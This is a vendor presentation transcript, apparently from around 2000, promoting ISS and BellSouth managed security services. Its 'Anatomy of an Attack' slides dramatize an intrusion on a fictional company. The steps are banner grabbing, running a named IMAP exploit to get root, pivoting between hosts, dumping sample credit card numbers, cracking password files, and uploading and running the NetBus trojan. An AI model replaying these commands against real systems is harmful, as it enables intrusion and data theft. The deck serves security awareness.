Protecting The Digital Economy

1
Protecting The Digital Economy
David GerulskiDirector of MarketingInternet
Security Systems
2
Agenda

• Introduction
• E-Commerce Security Drivers
• Developing a Security Policy
• Anatomy of an Attack
• Policy Enforcement
• Enterprise Risk Management
• Security Resources
• Conclusion

3
ISS Overview

• Headquartered in Atlanta, GA, USA
• Pioneered vulnerability assessment and intrusion
  detection technology
• Leader in Enterprise Security Management
• Publicly traded on NASDAQ ISSX
• Industry leading technology 35 product awards
• 1,000 employee owners worldwide
• Over 300 certified security partners
• Over 7,500 customers worldwide

4
ISS Market Share
Network Intrusion Detection Assessment Market
Network Intrusion Detection Market
Network Vulnerability Assessment Market
Source International Data Corporation (IDC),
August 1999
5
E-Commerce Security Drivers
6
Business Is Changing
Yesterday
Today
External Focus
Internal Focus
Suppliers, customers, and prospects all need some
form of access
Access is granted to employees only
Distributed Assets
Centralized Assets
Applications and data are distributed across
servers, locations, and business units
Applications and data are centralized in
fortified IT bunkers
Prevent Losses
Generate Revenue
The goal of security is to protect against
confidentiality breaches
The goal of security is to enable eCommerce
IT Control
Business Control
Security manager decides who gets access
Business units want the authority to grant access
Source Forrester Research, Inc.
7
The Threat Grows
Source 1998 Computer Security Institute/FBI
Computer Crime and Security Survey
8
The Internal Threat Is Real
9
E-Commerce Issues

• Principle Business Drivers
• Increase Revenue
• Increase Profitability
• Principle Security Drivers
• Greater Susceptibility to Attack
• Greater Probability of Catastrophic Consequences
• Much Greater Loss to Incident Ratio

10
Corporate Security Challenges

• Internet User and Transaction Growth
• eBusiness Is a Priority
• Benefits and Risks of Open Systems
• Dynamic Networks and Security Confusion
• Growing Internal and External Threats
• Limited Security Resources and Expertise
• Security Management Is Very Complex

11
Our Strength Is Our Weakness

• In Touch With Anyone With a Modem
• Have an International Presence
• Partners Can Now Collaborate
• Leverage Web-based Supply Chain Technologies
• Employees Can Work From Home, at Night, Over the
  Weekends, and on Holiday
• Application Servers Can Support Entire Divisions

12
Consequences

• Exposure to Legal Liability

13
DDoS Distributed Denial-of-Service
Company A
UNIX Firewall
Web Server
NT
UNIX
NT
UNIX
Company B
Router
University A
Company C
Company D
14
Consequences

• Exposure to legal liability

• Decreased Stockholder Equity
• 30 Seconds on CNN
• Damaged Image

15
(No Transcript)
16
Consequences

• Exposure to Legal Liability
• Decreased Stockholder Equity
• 30 Seconds on CNN
• Damaged Image

• Decreased Employee Productivity
• Loss of Intellectual Property Assets
• Inefficient Use of Resources

17
Summary

• E-Business is here to stay
• Networks are exposed and under attack
• Theres no more turning a blind eye
• Its a business issue and it should be treated in
  a business-like manner
• Implement a security program not a security
  technology

18
Developing a Security PolicyA Blueprint for
Success
19
Security Policy

• Blue Print for Good Security Program
• Standards Based - British Standard 7799
• Management Buy In
• High Level to Technical
• Business Driven Not Vendor Driven
• Non-Static

20
Enforced Security Policy

• Minimize Exposure to Vulnerabilities
• Prepare for Attacks on Our Systems
• Manage Internal Staff Behavior
• Manage External Access and Activity
• Maintain Appropriate Security Configurations
  Response Strategies
• Exploit Built-in Security Features
• Measure and Record Patterns and Trends for
  Future Security Planning

21
The Anatomy of an Attack
22
(No Transcript)
23
(No Transcript)
24
bigwidget.com
25
Registrant Big Widget, Inc. (BIGWIDGET_DOM)
1111 Big Widget Drive Really Big, CA 90120
US Domain Name BIGWIDGET.COM Administrative
Contact, Technical Contact Zone Contact, Billing
Contact Simms, Haywood (HS69) Dodge,
Rodger (RD32) Haywood.Simms_at_BIGWIDGET.COM
Rodger.Dodge_at_BIGWIDGET.COM 1111 Big Widget
Drive, UMIL04-07 1111 Big Widget Drive,
UMIL04-47 Really Big, CA 90210 Really Big,
CA 90210 678-443-6001 678-443-6014 Record
last updated on 24-June-2000 Record expires on
20-Mar-2010 Record created on 14-Mar-1998 Database
last updated on 7-Jun-2000 1554 Domain servers
in listed order EHECATL.BIGWIDGET.COM 208.21.0.7
NS1-AUTH.SPRINTLINK.NET 206.228.179.10 NS.COMMAND
CORP.COM 130.205.70.10
26
telnet bigwidget.com 25
hacker
Trying 10.0.0.28...
Connected to bigwidget.com
Escape character is ''.
Connection closed by foreign host.
telnet bigwidget.com 143
hacker
Trying 10.0.0.28...
Connected to bigwidget.com. OK bigwidget
IMAP4rev1 Service 9.0(157) at Wed, 14 Oct 1998
115150 -0400 (EDT) (Report problems in this
server to MRC_at_CAC.Washington.EDU)
. logout
BYE bigwidget IMAP4rev1 server terminating
connection . OK LOGOUT completed
Connection closed by foreign host.
27
imap
28
imap
29
(No Transcript)
30
hacker
./imap_exploit bigwidget.com
IMAP Exploit for Linux. Author Akylonius
(aky_at_galeb.etf.bg.ac.yu) Modifications p1
(p1_at_el8.org)
Completed successfully.
hacker
telnet bigwidget.com
Trying 10.0.0.28...
Connected to bigwidget.com.
Red Hat Linux release 4.2 (Biltmore) Kernel
2.0.35 on an i686
login
root
bigwidget
whoami
root
bigwidget
cd /etc
bigwidget
cat ./hosts
127.0.0.1 localhost localhost.localdomain
208.21.2.10 thevault accounting 208.21.2.
11 fasttalk sales 208.21.2.12 geekspeak
engineering 208.21.2.13 people
human resources 208.21.2.14 thelinks
marketing 208.21.2.15 thesource
information systems
bigwidget
rlogin thevault
31
cd /data/creditcards
thevault
cat visa.txt
thevault
Allan B. Smith 6543-2223-1209-4002 12/99 Donna
D. Smith 6543-4133-0632-4572 06/98 Jim Smith
6543-2344-1523-5522 01/01 Joseph L.Smith
6543-2356-1882-7532 04/02 Kay L. Smith
6543-2398-1972-4532 06/03 Mary Ann Smith
6543-8933-1332-4222 05/01 Robert F. Smith
6543-0133-5232-3332 05/99
thevault
crack /etc/passwd
Cracking /etc/passwd...
username bobman password nambob
username mary password mary
username root password ncc1701
thevault
ftp thesource
Connected to thesource 220 thesource Microsoft
FTP Service (Version 4.0).
Name
administrator
331 Password required for administrator.
Password

230 User administrator logged in.
Remote system type is Windows_NT.
32
(No Transcript)
33
(No Transcript)
34
ftp
cd \temp
250 CDW command successful.
ftp
send netbus.exe
local netbus.exe remote netbus.exe
ftp
200 PORT command successful.
150 Opening BINARY mode data connection for
netbus.exe
226 Transfer complete.
ftp
quit
thevault
telnet thesource
Trying 208.21.2.160.
.. Connected to thesource.bigwidget.com.
Escape character is ''.
Microsoft (R) Windows NT (TM) Version 4.00 (Build
1381)
Welcome to MS Telnet Service Telnet Server Build
5.00.98217.1 login
administrator
password


Welcome to Microsoft Telnet
Server.
C\
cd \temp
C\TEMP
netbus.exe
35
(No Transcript)
36
Anatomy of the Attack
BigWidgets Network
Web Server
NT
UNIX
NT
UNIX
UNIX Firewall
Router
Network
E-Mail Server
Clients Workstations
37
Real World Web Page Defacements
38
(No Transcript)
39
(No Transcript)
40
New York Times
41
(No Transcript)
42
Policy Enforcement Through Detection and Response
43
What Is Vulnerable?
IT Infrastructure
Web Server
Servers
Firewall
Router
Network
E-Mail Server
Clients Workstations
44
What Is Vulnerable?
Applications
E-Commerce Web Server
Peoplesoft
SAP
Firewall
Router
E-Mail Server
Web Browsers
45
What Is Vulnerable?
Databases
Microsoft SQL Server
Sybase
Oracle
Firewall
Router
46
What Is Vulnerable?
Operating Systems
Solaris
Windows NT
HP-UX
Firewall
Router
Network
AIX
Windows 95 NT
47
What Is Vulnerable?
Networks
Web Server
Servers
Firewall
Router
TCP/IP
Netware
E-Mail Server
48
Enterprise Risk Management
49
Enterprise Security Management
50
Vulnerability Assessment Service
51
Managed Intrusion Detection Service
EMAIL ALERT/ LOG
SESSION TERMINATED
SESSION LOGGED
ATTACK DETECTED
RECONFIGURE FIREWALL/ ROUTER
ATTACK DETECTED
RECORD SESSION
52
Why a managed solution?
Reasons for firewall breach
Computer Security Institute Study 1998
53
Why Outsource?

• Network Security Is Complex
• Requires Specialized Skills and Dedicated
  Resources
• Difficulty in Hiring, Maintaining and Retaining
  IT Security Staff
• High Costs of Doing It on Your Own

54
Managed Firewall Home Page
55
Firewall Security Policy
56
Firewall - Daily Logs
57
Web Usage Report
58
Intrusion Detection Daily Events
59
Intrusion DetectionCustom - Query Entry Screen
60
Benefits of Using BellSouths Managed Security
Services

• Enables organizations to establish and maintain
  security across the Internet, Intranet and
  Extranet
• Less expensive
• Leverage an existing security infrastructure
• Offers reliability and cost-effectiveness without
  having to maintain 24x7 dedicated security staff
• Scaleable and modular services enable increased
  flexibility to upgrade services as needed
• More Secure
• Based on a robust and proven security
  architecture
• Utilizes best of breed technologies
• Supported by a dedicated staff of security
  engineers.
• Proven operational procedures ensure proper
  response and escalation of security events
• Round-the-clock real-time monitoring for
  full-time protection
• All critical Internet-based security needs are
  addressed
• Frees up your resources to focus on other key
  company initiatives

61
BellSouth ISS Value Proposition

• BellSouth
• Trusted Business Partner
• Operational Excellence
• Highest levels of Customer Satisfaction
• Internet Security Systems (ISS)
• Security Expertise
• Market leader in security
• Together
• Best in class IP access and network security
  solutions to support your E-Business strategy

62
Thank You!
For more information please join us at
www.iss.net